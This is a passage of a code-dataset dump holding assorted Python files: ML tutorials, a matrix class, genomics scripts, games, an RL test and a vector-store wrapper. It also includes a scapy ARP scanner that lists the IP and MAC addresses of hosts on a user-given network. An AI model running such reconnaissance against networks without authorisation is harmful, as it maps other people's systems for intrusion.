in range(m):\n dataset.addSample(X[i], y[i])\n\ntst_data, trn_data = dataset.splitWithProportion(0.25)\n\ntst_data._convertToOneOfMany()\ntrn_data._convertToOneOfMany()\n\nlayers = [trn_data.indim]\nlayers += num_hidden_layers\nlayers += [trn_data.outdim]\n\nneural_network = buildNetwork(*layers, outclass=SoftmaxLayer)\ntrainer = BackpropTrainer(neural_network, dataset=trn_data, verbose=False,\n weightdecay=0.01, momentum=0.1)\n\n\nfig = plt.figure()\nfig.set_size_inches(15, 15)\n\nax_data = plt.subplot(1, 2, 1)\nplt.scatter(X[:, 0], X[:, 1], c=y, s=40)\nplt.xlabel('X1')\nplt.ylabel('X2')\nplt.title('Input Data')\n\nax = plt.subplot(1, 2, 2)\nscat = ax.scatter(tst_data['input'][:, 0], tst_data['input'][:, 1], s=60)\nplt.xlabel('X1')\nplt.ylabel('X2')\nplt.title('Classification of Data using Neural Network')\n\niter_text = ax.text(0, 0, '')\n\n\ndef setup_plot():\n iter_text.set_text('')\n return scat,\n\n\ndef update(i):\n trainer.trainEpochs(1)\n out = neural_network.activateOnDataset(tst_data)\n out = out.argmax(axis=1)\n scat.set_array(out)\n iter_text.set_text('Iteration = '+str(i+1))\n return scat,\n\nanim = animation.FuncAnimation(fig, update, init_func=setup_plot,\n frames=max_iters, repeat=False)\n\nplt.show()\n","repo_name":"abinashpanda/ml_tutorial","sub_path":"neural_network_classification.py","file_name":"neural_network_classification.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2968189639","text":"#!/usr/bin/env python\n#ARP Scanner\n\nimport scapy.all as scapy\nimport pprint\n\ndef scan(ip):\n\tarp_request = scapy.ARP(pdst=ip)\n\tbroadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n\tarp_request_broadcast = broadcast/arp_request\n\tanswered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=0)[0]\n\t\n\tprint(\"IP\\t\\t\\t\\tMAC Address\\n---------------------------------------------------------------------\")\n\tfor element in answered_list:\n\t\tprint(element[1].psrc+\"\\t\\t\\t\"+element[1].hwsrc)\n\nip_input = raw_input(\"ENTER THE NETWORK YOU WISH TO ARP SCAN: \")\n\nscan(ip_input)\n \n","repo_name":"KangusPrime/Python-","sub_path":"arp_scan.py","file_name":"arp_scan.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71743305051","text":"import numbers\n\nimport numpy as np\n\n\ndef validate_matrix_dimensions(matrix):\n if len(matrix) == 0:\n raise ValueError(\"Matrix is empty\")\n for m in matrix:\n if len(m) != len(matrix[0]):\n raise ValueError(\"Rows of matrix have different sizes\")\n\n\ndef validate_matrices_for_element_by_element_operation(m1, m2):\n if len(m1) != len(m2) or len(m1[0]) != len(m2[0]):\n raise ValueError(\"Matrices dimensions don't match\")\n\n\ndef validate_matrices_for_multiply_dimensions(m1, m2):\n if len(m1[0]) != len(m2):\n raise ValueError(\"Matrices dimensions don't match\")\n\n\nclass Matrix:\n check_matrix_dimensions = staticmethod(validate_matrix_dimensions)\n check_matrices_for_multiply_dimensions = staticmethod(validate_matrices_for_multiply_dimensions)\n check_matrices_for_element_by_element_operation = staticmethod(validate_matrices_for_element_by_element_operation)\n\n def __init__(self, matrix):\n Matrix.check_matrix_dimensions(matrix)\n self.matrix = matrix\n\n def __str__(self):\n return \"[\" + \"\\n\".join([\n \"[\" + \", \".join([str(element) for element in row]) + \"]\"\n for row in self.matrix\n ]) + 
\"]\"\n\n def __element_by_element_operation(self, other, operation):\n Matrix.check_matrix_dimensions(other.matrix)\n Matrix.check_matrices_for_element_by_element_operation(self.matrix, other.matrix)\n res_matrix = []\n number_of_cols = len(self.matrix[0])\n for i in range(len(self.matrix)):\n res_matrix.append([operation(self.matrix[i][j], other.matrix[i][j]) for j in range(number_of_cols)])\n return Matrix(res_matrix)\n\n def __add__(self, other):\n return self.__element_by_element_operation(other, type(self.matrix[0][0]).__add__)\n\n def __mul__(self, other):\n return self.__element_by_element_operation(other, type(self.matrix[0][0]).__mul__)\n\n def __matmul__(self, other):\n Matrix.check_matrix_dimensions(other.matrix)\n Matrix.check_matrices_for_multiply_dimensions(self.matrix, other.matrix)\n\n res_matrix = []\n number_of_cols = len(self.matrix[0])\n for i in range(len(self.matrix)):\n row = []\n for j in range(len(self.matrix[0])):\n row.append(sum([self.matrix[i][k] * other.matrix[k][j] for k in range(number_of_cols)]))\n res_matrix.append(row)\n return Matrix(res_matrix)\n\n\nclass WriteMatrixMixin:\n def __init__(self, matrix):\n self.__matrix = matrix\n\n def write_to_file(self, path):\n with open(path, \"w\") as file:\n file.write(self.__str__())\n\n def __str__(self):\n return \"[\" + \"\\n\".join([\n \"[\" + \", \".join([str(element) for element in row]) + \"]\"\n for row in self.__matrix\n ]) + \"]\"\n\n @property\n def matrix(self):\n return self.__matrix\n\n @matrix.setter\n def matrix(self, new_matrix):\n self.__matrix = new_matrix\n\n\nclass ArrayLike(np.lib.mixins.NDArrayOperatorsMixin, WriteMatrixMixin):\n def __init__(self, value):\n super().__init__(value)\n self.value = np.asarray(value)\n\n _HANDLED_TYPES = (np.ndarray, numbers.Number)\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):\n out = kwargs.get(\"out\", ())\n for x in inputs + out:\n if not isinstance(x, self._HANDLED_TYPES + (ArrayLike,)):\n return NotImplemented\n\n inputs = tuple(x.value if isinstance(x, ArrayLike) else x\n for x in inputs)\n if out:\n kwargs[\"out\"] = tuple(\n x.value if isinstance(x, ArrayLike) else x\n for x in out)\n result = getattr(ufunc, method)(*inputs, **kwargs)\n\n if type(result) is tuple:\n return tuple(type(self)(x) for x in result)\n elif method == \"at\":\n return None\n else:\n return type(self)(result)\n\n def __repr__(self):\n return \"%s(%r)\" % (type(self).__name__, self.value)\n\n\nif __name__ == \"__main__\":\n np.random.seed(0)\n a = Matrix(np.random.randint(0, 10, (10, 10)))\n b = Matrix(np.random.randint(0, 10, (10, 10)))\n with open(\"artifacts/easy/matrix+.txt\", \"w\") as file:\n file.write((a + b).__str__())\n with open(\"artifacts/easy/matrix*.txt\", \"w\") as file:\n file.write((a * b).__str__())\n with open(\"artifacts/easy/matrix@.txt\", \"w\") as file:\n file.write((a @ b).__str__())\n\n a = ArrayLike(a.matrix)\n b = ArrayLike(b.matrix)\n (a + b).write_to_file(\"artifacts/medium/matrix+.txt\")\n (a * b).write_to_file(\"artifacts/medium/matrix*.txt\")\n (a @ b).write_to_file(\"artifacts/medium/matrix@.txt\")\n","repo_name":"df530/AdvancedPython2022","sub_path":"hw_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12266094031","text":"import os.path\nfrom py4j.java_gateway import JavaGateway\nfrom LogoFinder import Detect_Logo\nfrom OCR import contentVerify\n\n#This function processes the image and return 
the appropriate image\n\n#Input: String (name of the image), Boolean (Filter or not)\n#Output: String (name of the original/updated image)\n\ndef imageProcessor(image, filterRequested):\n decidedImage = image\n#(Step 1) Given an image name, if it fails to find the image, error must be raised.\n if not os.path.isfile(image):\n raise IOError\n\n#Don't filter out jpg. They are already compressed enough!\n ext = os.path.splitext(image)[-1].lower()\n if ext == \".jpg\":\n filterRequested = False;\n\n#(Step 2) Using OCR, verify whether the image is for the advertisement purpose or not.\n score = 0\n advertisement = False\n \n #If there is a brand name, it is possible that it's going to be the advertisement\n if Detect_Logo(image):\n score += 1\n \n score += contentVerify(image)\n \n #print(score)\n #If the score reaches the threshold, then consider it as an advertisement\n if score >= 10:\n advertisement = True\n\n#(Step 3) Using Java, Convert image from original to Grayscale without modifying the original image\n if filterRequested and advertisement:\n gateway = JavaGateway()\n convertImage = gateway.entry_point\n convertImage.runImageProcessing(image)\n decidedImage = 'Filtered.png'\n gateway.close()\n \n#based on the \"filterRequest\" Boolean, send the name of original/updated image\n return decidedImage\n\n#Tester\n#print(imageProcessor('DEMO1.png', True))\n#Tester\nif __name__ == '__main__':\n imageForTest = \"proteinsale.png\"\n image_path = os.getcwd() + \"\\\\img\\\\\" + imageForTest\n print(contentVerify(image_path))","repo_name":"chihiroanihr/ecomail","sub_path":"ImageProcessor.py","file_name":"ImageProcessor.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24285890882","text":"#!/usr/bin/env python3\nimport csv\nimport src.metric as metric\nimport sys\nimport src.classSpecies as classSpecies\nimport src.ncbi as ncbi\nimport os\n\n#opening of the csv.\ncsvfile = open(sys.argv[1]) # CSV containing \"taxid\" \"human_gene\" \"ortholog\"\ncsv_reader = csv.DictReader(csvfile)\n\nhuman_gene_set = set() # set of humans genes\nspecies_dic = dict() # dic of object species\n\n#recovery of species and associated genes.\nfor row in csv_reader:\n human_gene_set.add(row[\"human_gene\"]) # creates a set of all the available human genes\n if row[\"taxid\"] not in species_dic: # if the species object for this taxid does not exists\n species_dic[row[\"taxid\"]] = classSpecies.species(row[\"taxid\"])\n species_dic[row[\"taxid\"]].set_species_name(row[\"species\"])\n species_dic[row[\"taxid\"]].add_gene(row[\"human_gene\"], row[\"geneID\"]) # uses the add_gene function to add the current ortholog to the species object\n\n#we browse species by species\nfor taxid, classSpecies in species_dic.items():\n if os.path.isfile('work_done.txt'):\n exist=False\n work_done = open('work_done.txt','r')\n lignes = work_done.readlines()\n work_done.close()\n for i in lignes:\n if int(i)==int(taxid):\n print(\" We already have metrics for the species {}. We move on to the next specie. 
\".format(classSpecies.species))\n exist=True\n\n if exist==True:\n continue\n \n print(\"download gff and fasta files for the {} species \".format(classSpecies.species))\n #recovery of genomes in the form of fasta and gff\n try:\n extracted_file_list=ncbi.get_genome(classSpecies.species)\n except:\n print(\"we not find the fasta and the gff of the complete genome of {} species, we move on to the next specie.\".format(classSpecies.species))\n continue\n #verification that we have one fasta and one gff files.\n if len(extracted_file_list) != 2:\n if len(extracted_file_list)==1:\n print(\"the fasta or the gff is missing for the {} species. We go to the next species\".format(classSpecies.species))\n os.remove(extracted_file_list[0])\n continue\n else:\n print(\"there is more than one fasta or gff uploaded for the {} species. We go to the next species\".format(classSpecies.species))\n for i in extracted_file_list:\n os.remove(i)\n continue\n pathToFasta= extracted_file_list[1]\n pathToGFF= extracted_file_list[0]\n \n #creation of a dictionary with the human taxID as key and an info_gene object in value\n genIDlist=dict()\n for humanid,genID in classSpecies.get_genes().items():\n genIDlist[genID[0]]=humanid\n \n #parsing of the gff to get the coordinates of genes, exons and chromosomes\n print(\"gff parsing\")\n dict_genes=metric.parsingGFF(genIDlist,pathToGFF)\n #parsing of the fasta to obtain the sequences of the genes, exons and regions, flanking\n print(\"fasta parsing\")\n dict_genes=metric.parsing_fasta(dict_genes,pathToFasta)\n \n \n #calculation of GC rates from the sequences obtained\n for i in dict_genes.values():\n metric.taux_GC(i)\n \n #obtaining the size of the introns\n metric.get_intron_size(dict_genes)\n \n #creation of different metric files (one per metric)\n if not os.path.isfile('metrics_GC_gene.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC_gene')\n metric.write_tab_metrics(dict_genes,'GC_gene',taxid)\n \n if not os.path.isfile('metrics_GC_exons.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC_exons')\n metric.write_tab_metrics(dict_genes,'GC_exons',taxid)\n \n if not os.path.isfile('metrics_GC3_exons.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC3_exons')\n metric.write_tab_metrics(dict_genes,'GC3_exons',taxid)\n \n if not os.path.isfile('metrics_intron_size.tsv'):\n metric.create_tab_metrics(human_gene_set,'intron_size')\n metric.write_tab_metrics(dict_genes,'intron_size',taxid)\n \n if not os.path.isfile('metrics_GC_flanking_region_before.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC_flanking_region_before')\n metric.write_tab_metrics(dict_genes,'GC_flanking_region_before',taxid)\n \n if not os.path.isfile('metrics_GC_flanking_region_after.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC_flanking_region_after')\n metric.write_tab_metrics(dict_genes,'GC_flanking_region_after',taxid)\n \n \n if not os.path.isfile('work_done.txt'):\n work_done = open('work_done.txt','w')\n work_done.write(str(taxid)+'\\n')\n work_done.close() \n else:\n work_done=open('work_done.txt','a')\n work_done.write(str(taxid)+'\\n')\n work_done.close()\n os.remove(pathToFasta)\n os.remove(pathToGFF)\n\nos.remove(\"work_done.txt\") \n","repo_name":"xyloforce/genomic_landscapes","sub_path":"get_metric_from_geneID.py","file_name":"get_metric_from_geneID.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4799665378","text":"#Kaylee Petek\r\n#CS61002 Algorithms and 
Programming I\r\n#Lab 07\r\n#November 7, 2021\r\n\r\n#A pgrogram to move a ball left, right, up, and down\r\n\r\n#import tkinter\r\nfrom tkinter import *\r\n\r\n#create a class to move a ball on a screen\r\nclass moveBall:\r\n def __init__ (self):\r\n self.root = Tk () #constructs root window\r\n self.root.title(\"Moving Ball\") #Create a title\r\n self.root.resizable (False, False) #size cannot be changed\r\n\r\n self.width=300 #create a width variable\r\n self.height=300 #create a height variable\r\n self.canvas = Canvas (self.root, width=self.width, height=self.height) #create the canvas\r\n self.canvas.pack() #display the canvas\r\n\r\n frame = Frame(self.root) #create the frame\r\n frame.pack() #display the frame\r\n\r\n self.canvas.create_rectangle(10,10,290,290) #create a border\r\n\r\n x1=self.width/2 #create coordinate variable for x1\r\n y1=self.height/2 #create coordinate variable for y1\r\n x2=x1+10 #create coordinate variable for x2\r\n y2=y1+10 #create coordinate variable for y2\r\n self.ball = self.canvas.create_oval(x1,y1,x2,y2, fill=\"red\") #create a ball\r\n \r\n btLeft = Button (frame, text = (\"Left\"), command = self.moveBallLeft) #create a left button that moves the ball left\r\n btRight = Button (frame, text = (\"Right\"), command = self.moveBallRight) #create a right button to move the ball right\r\n btUp = Button (frame, text = (\"Up\"), command = self.moveBallUp) #create an up button to move the ball up\r\n btDown = Button (frame, text = (\"Down\"), command = self.moveBallDown) #create a down button to move the ball down\r\n\r\n btLeft.pack(side=LEFT) #display the left button on the left side\r\n btRight.pack(side=RIGHT) #display the right button on the right side\r\n btUp.pack() #display the up button above the down button\r\n btDown.pack() #display the down button below the up button\r\n\r\n self.root.mainloop() #enters a game loop\r\n \r\n #create a function to move the ball left\r\n def moveBallLeft (self):\r\n left, top, right, bottom = self.canvas.coords(self.ball) #obtain coordinates of the ball\r\n if left <= 10: #if the ball reaches an x coordinate of 10 or less\r\n x = 0 #do not move further on the x, x becomes 0\r\n else: # if the x coordinate is greater than 10\r\n x=-10 #move to the left 10 spaces\r\n y=0 #no change in y\r\n self.canvas.move(self.ball, x, y) #move the ball\r\n\r\n \r\n #create a function to move the ball right \r\n def moveBallRight (self):\r\n left, top, right, bottom = self.canvas.coords(self.ball) #obtain coordinates of the ball\r\n if right>=290: #if the ball reaches an x coordinate of 290 or more\r\n x = 0 #do not move the ball further (it reached the boundary)\r\n else: #else the x coordinate is less than 290\r\n x= 10 #change the x coordinate by 10 to the right\r\n y=0 #no change in y\r\n self.canvas.move (self.ball, x, y) #move the ball\r\n\r\n \r\n #create a function to move the ball up \r\n def moveBallUp (self):\r\n left, top, right, bottom = self.canvas.coords(self.ball) #obtain the coordinates\r\n if top<=10: #if the ball reaches a y coordinate of 10 or less\r\n y = 0 #do not move the ball (it reached the boundary)\r\n else: #else the ball has a y coordinate of more than 10\r\n y=-10 #change the y coordiante by 10 up\r\n x=0 #no change in x\r\n self.canvas.move(self.ball, x, y) #move the ball up\r\n \r\n #create a function to move the ball down\r\n def moveBallDown(self):\r\n left, top, right, bottom = self.canvas.coords(self.ball) #obtain the coordinates of the ball\r\n if bottom>=290: #if the ball reaches a y 
coordinate of 290 or more\r\n y = 0 #do not change y (it reached the boundary)\r\n else: #else the ball has a y coordinate of less than 290\r\n y=10 #change the y coordinate by 10 down\r\n x=0 #no change in x\r\n self.canvas.move (self.ball, x, y) #move the ball down\r\n \r\n\r\n\r\n#call the class\r\nmoveBall()\r\n\r\n","repo_name":"kpetek/Python","sub_path":"KayleePetekLab07.py","file_name":"KayleePetekLab07.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7125552534","text":"import gym\nimport gym_bertrandcompetition\nfrom gym_bertrandcompetition.envs.bertrand_competition_discrete import BertrandCompetitionDiscreteEnv\n\nimport ray\nimport numpy as np\nfrom ray.tune.registry import register_env\nimport ray.rllib.agents.a3c as a3c\nfrom ray.rllib.agents.dqn import DQNTrainer\n# from ray.rllib.agents.ppo import PPOAgent\nfrom ray.tune.logger import pretty_print\n\n# from ray.rllib.env import MultiAgentEnv\n\n# cd OneDrive/Documents/Research/RLcollusionpricing\n\n# env = gym.make('BertrandCompetitionDiscrete-v0')\n\nconfig = {\n 'env_config': {\n 'num_agents': 2,\n },\n 'env': 'Bertrand',\n 'num_workers': 2,\n # 'eager': True,\n # 'use_pytorch': False,\n 'train_batch_size': 200,\n 'rollout_fragment_length': 200,\n 'lr': 0.001\n}\n\n# class Rwrapper(gym.RewardWrapper):\n# def __init__(self, env):\n# self.reward_range = env.reward_range\n# super(gym.RewardWrapper, self).__init__(env)\n# def reward(self, reward):\n# return reward\n# register_env('Bertrand', lambda env_config: Rwrapper(BertrandCompetitionDiscreteEnv()))\n\n\nregister_env('Bertrand', lambda env_config: BertrandCompetitionDiscreteEnv())\nray.init(num_cpus=4)\ntrainer = DQNTrainer(config = config, env = 'Bertrand')\n\n# register_env('Bertrand', lambda env_config: BertrandCompetitionDiscreteEnv())\n# trainer = PPOAgent(config = config, env = 'Bertrand')\n\ns = \"{:3d} reward {:6.2f}/{:6.2f}/{:6.2f} len {:6.2f}\"\n\npN = 1\npM = 10\nxi = 0.1\nm = 15\n\na_space = np.linspace(pN - xi * (pM - pN), pM + xi * (pM - pN), m)\n\nfor i in range(20):\n result = trainer.train()\n # print(pretty_print(result))\n print(s.format(\n i + 1,\n result[\"episode_reward_min\"],\n result[\"episode_reward_mean\"],\n result[\"episode_reward_max\"],\n result[\"episode_len_mean\"]))\n\n # print(trainer.compute_action({'agent_0': (a_space[3], a_space[3]), 'agent_1': (a_space[3], a_space[3])}))\n # print(trainer.compute_action({'agent_0': (0, 0), 'agent_1': (0, 0)}))\n # print(trainer.compute_action(a_space[3], a_space[3]))","repo_name":"nlepore33/RLcollusionpricing","sub_path":"gym_bertrand_test.py","file_name":"gym_bertrand_test.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38060081606","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Path: asreviewcontrib\\semantic_clustering\\main.py\n\nimport argparse\nimport sys\n\nimport webbrowser\nfrom pathlib import Path\n\nfrom asreview.data import load_data\nfrom asreview.entry_points import BaseEntryPoint\nfrom asreviewcontrib.semantic_clustering.interactive import run_app\nfrom asreviewcontrib.semantic_clustering.semantic_clustering import run_clustering_steps # noqa: E501\n\n\nclass SemClusEntryPoint(BaseEntryPoint):\n description = \"Semantic clustering tools for ASReview.\"\n extension_name = \"semantic_clustering\"\n\n def __init__(self):\n self.version = \"0.1\"\n\n def execute(self, 
argv):\n args = _parse_arguments(\n version=f\"{self.extension_name}: {self.version}\", argv=argv)\n\n if args.filepath:\n data = load_data(args.filepath)\n run_clustering_steps(\n data,\n args.output,\n transformer=args.transformer)\n\n elif args.app:\n url = \"http://127.0.0.1:8050/\"\n webbrowser.open(url, new=2, autoraise=True)\n run_app(args.app)\n sys.exit(1)\n\n\n# check file extension\ndef _valid_file(fp):\n if Path(fp).suffix.lower() != \".csv\":\n raise ValueError('File must have a .csv extension')\n\n\n# argument parser\ndef _parse_arguments(version=\"Unknown\", argv=None):\n parser = argparse.ArgumentParser(prog='asreview semantic_clustering')\n group = parser.add_mutually_exclusive_group()\n\n group.add_argument(\n \"-f\",\n \"--filepath\",\n metavar=\"INPUT FILEPATH\",\n help=\"processes the specified file\",\n type=str,\n )\n group.add_argument(\n \"-a\",\n \"--app\",\n metavar=\"INPUT FILEPATH\",\n help=\"runs the app from a file created with the semantic clustering \"\n \"extension\",\n type=argparse.FileType('r', encoding='UTF-8')\n )\n\n parser.add_argument(\n \"-v\",\n \"--version\",\n action=\"version\",\n version=\"%(prog)s \" + version,\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n help=\"output file name\",\n metavar=\"OUTPUT FILE NAME\",\n type=str,\n default=\"output.csv\"\n )\n\n parser.add_argument(\n \"--transformer\",\n help=\"select a transformer to use\",\n metavar=\"TRANSFORMER\",\n type=str,\n default='allenai/scibert_scivocab_uncased'\n )\n\n # Exit if no arguments are given\n if len(argv) == 0:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n args = parser.parse_args(argv)\n\n # Check if the file extension is correct\n if args.app is not None:\n _valid_file(args.app.name)\n\n if args.output is not None:\n _valid_file(args.output)\n\n return args\n","repo_name":"asreview/semantic-clusters","sub_path":"asreviewcontrib/semantic_clustering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"72292278170","text":"from typing import List, Callable\n\nfrom langchain.docstore.document import Document\nfrom langchain.vectorstores.pgvector import PGVector\n\nfrom vectorstore.base import CustomBaseVectorStore\nfrom app.core.configuration import settings\nfrom app.utils.constants import VectorDatabaseConstants\n\n\nclass CustomPGVector(PGVector, CustomBaseVectorStore):\n def __init__(\n self,\n embedding_function: Callable,\n collection_name: str,\n ) -> None:\n pass\n # connection_string = settings.SQLALCHEMY_DATABASE_URI\n # super().__init__(connection_string, embedding_function, collection_name)\n\n def connect_to_vectorstore(self):\n return super().connect()\n\n def insert_documents(self, docs: List[Document]):\n self.add_documents(docs)\n\n def search_documents(\n self, query: str, top_k: int, query_preprocessing: bool = False\n ) -> List[Document]:\n if query_preprocessing:\n query = self.preprocess_text(query)\n\n relevant_documents = self.similarity_search(query=query, k=top_k)\n\n return self._token_safe_documents(\n relevant_documents, query, conversation_history_token=0\n )\n\n def delete_documents(self, docs: List[Document]):\n raise NotImplementedError(\"method implementation pending\")\n\n def update_documents(self, docs: List[Document]):\n raise NotImplementedError(\"method implementation pending\")\n\n\ncustom_pgvector = CustomPGVector(\n collection_name=\"langchain-pgvectore\",\n 
embedding_function=VectorDatabaseConstants.VECTOR_EMBEDDING.value,\n)\n","repo_name":"mitul-kalariya/NBIC","sub_path":"application/vectorstore/custom_pgvector.py","file_name":"custom_pgvector.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4435019917","text":"# 5'. Даны два файла, в каждом из которых находится запись многочлена. \n# Задача - сформировать файл, содержащий сумму многочленов\n# В file1.txt :\n# 2*x**2 + 4*x + 5\n# В file2.txt:\n# 4*x**2 + 1*x + 4\n# Результирующий файл:\n# 6*x**2 + 5*x + 9\n\nimport sympy\n\ndef get_polynom(file_num: int) -> str:\n \"\"\"Взять многочлен из файла\"\"\"\n with open(f'file{file_num}.txt', 'r') as f:\n polynom = f.readline()\n return polynom\n\n\n\"\"\"Сумма двух многочленов\"\"\"\npolynom1 = sympy.simplify(get_polynom(1))\npolynom2 = sympy.simplify(get_polynom(2))\nprint('\\t\\t' + str(polynom1) + '\\n\\t\\t' + str(polynom2))\nx = sympy.Symbol('x')\npolynom = str(sympy.simplify(polynom1 + polynom2))\nprint('Сумма = ' + polynom)\nwith open('file3.txt', 'w') as f:\n f.write(polynom)\n","repo_name":"ShevchenkoJS/DzPython4","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18839996638","text":"from player import Player\r\nfrom field import Field\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.__players = [Player('Player 1'), Player('Player 2')]\r\n self.__fields = [Field() for player in self.__players] #enemy field for each player\r\n self.__current_player = 0\r\n\r\n def shoot_at(self, index, pos):\r\n self.__fields[index].shoot_at(pos)\r\n\r\n def field_with_ships(self, index):\r\n return self.__fields[index].field_with_ships()\r\n\r\n def field_without_ships(self, index):\r\n return self.__fields[index].field_without_ships()\r\n\r\n def play(self):\r\n while True:\r\n for i in range(len(self.__players)):\r\n print(\"Enemy field:\\n\" + str(self.__fields[i]))\r\n self.__fields[i].shoot_at(self.__players[i].read_position())\r\n if not self.__fields[i].has_alive_ships():\r\n print(self.__players[i], 'win!')\r\n\r\n\r\ndef test():\r\n p = Player('Simple AI')\r\n f = Field()\r\n for x in range(f.field_size[0]):\r\n for y in range(f.field_size[1]):\r\n print(f)\r\n shoot_pos = (x,y)\r\n print('Shoot at pos:', shoot_pos)\r\n f.shoot_at(shoot_pos)\r\n if not f.has_alive_ships():\r\n print(p, \"win\")\r\n return\r\n","repo_name":"anyahayda/Battleship","sub_path":"BattleshipPart2/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3862531423","text":"# -*- coding: utf-8 -*-\nimport ffext\nimport msgtype.ttypes as MsgDef\nimport weakref\nfrom base import Base\nfrom model import TeamModel, PlayerModel, ItemModel, ArenaModel\nfrom db import DbService\n\ndef buildErrMsg(cmd, errMsg):\n return MsgDef.ErrorMsgRet(0, cmd, errMsg)#'cmd=%d,errMsg=%s'%(cmd, errMsg)\n\n#竞技场购买价格\nAREANA_BUY_PRICE = [\n [1,\t2000],\n [2,\t3000],\n [3,\t4000],\n [4,\t5000],\n [5,\t6000],\n [6,\t7000],\n [7,\t8000],\n [8,\t9000],\n [9,\t10000],\n [10,11000],\n]\n#竞技场\n@ffext.onLogic(MsgDef.ClientCmd.ARENA_OPS, MsgDef.ArenaOpsReq)\ndef processArenaReq(session, msg = None):\n player = session.player\n arenaCtrl = player.arenaCtrl\n if msg.opstype == 0 or msg.opstype == 1:#0表示显示竞技场数据\n retMsg = 
MsgDef.ArenaOpsRet(msg.opstype, arenaCtrl.leftChallengeTimes, arenaCtrl.score, ArenaModel.getArenaMgr().getRankByUid(player.uid), [])\n retMsg.listPlayers = ArenaModel.getArenaMgr().allRank\n session.sendMsg(MsgDef.ServerCmd.ARENA_OPS, retMsg)\n elif msg.opstype == 2:#显示积分兑换\n retMsg = MsgDef.ArenaOpsRet(msg.opstype, arenaCtrl.leftChallengeTimes, arenaCtrl.score, arenaCtrl.rank, [], [])\n\n for k, itemCfgPair in ItemModel.getItemMgr().arenaScoreItem.iteritems():\n item = MsgDef.Item()\n itemCfg = itemCfgPair[0]\n ItemModel.tmpBuildItem(item, itemCfg)\n retMsg.listItems.append(MsgDef.ArenaScore2Item(itemCfgPair[1], item))\n session.sendMsg(MsgDef.ServerCmd.ARENA_OPS, retMsg)\n return\n elif msg.opstype == 3:#积分兑换\n cfgid = msg.idArg\n destCfg = None\n if msg.numArg < 0:\n msg.numArg = 1\n for k, itemCfgPair in ItemModel.getItemMgr().arenaScoreItem.iteritems():\n itemCfg = itemCfgPair[0]\n if itemCfg.cfgId == cfgid:\n destCfg = itemCfgPair\n break\n if None == destCfg:\n session.sendMsg(MsgDef.ServerCmd.ERROR_MSG, buildErrMsg(MsgDef.ClientCmd.ARENA_OPS, '参数有误'))\n return\n score = destCfg[1] * msg.numArg\n if player.arenaCtrl.score < score:\n session.sendMsg(MsgDef.ServerCmd.ERROR_MSG, buildErrMsg(MsgDef.ClientCmd.ARENA_OPS, '积分不足'))\n return\n needPkgNum = msg.numArg\n if destCfg[0].flagDieJia:\n needPkgNum = 1\n if player.itemCtrl.getFreePkgSize() < needPkgNum:\n session.sendMsg(MsgDef.ServerCmd.ERROR_MSG, buildErrMsg(MsgDef.ClientCmd.ARENA_OPS, '包裹不足'))\n return\n player.AddScoreArena(-1 * score)\n itemObj = player.itemCtrl.addItemByCfgId(cfgid)\n from handler import ItemHandler\n ItemHandler.processQueryPkg(session)\n retMsg = MsgDef.ArenaOpsRet(msg.opstype, arenaCtrl.leftChallengeTimes, arenaCtrl.score, arenaCtrl.rank, [], [])\n session.sendMsg(MsgDef.ServerCmd.ARENA_OPS, retMsg)\n\n return\n elif msg.opstype == 4:#挑战某人\n if player.arenaCtrl.leftChallengeTimes <= 0:\n session.sendMsg(MsgDef.ServerCmd.ERROR_MSG, buildErrMsg(MsgDef.ClientCmd.ARENA_OPS, '每天最多挑战10次'))\n return\n ArenaModel.getArenaMgr().createArena(session.player, msg.destuid)\n return\n","repo_name":"fanchy/spython","sub_path":"pysrc/handler/ArenaHandler.py","file_name":"ArenaHandler.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"29922005777","text":"\ndef handle_two_digits(s):\n if not s: return 0\n ones = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen', 'nineteen'] \n tens = ['zero', 'ten', 'twenty', 'thirty', 'fourty', 'fifty', 'sixty', 'seventy', 'eighty', 'ninety']\n if ' ' in s:\n x,y = s.split(' ')\n return 10 * tens.index(x) + ones.index(y)\n 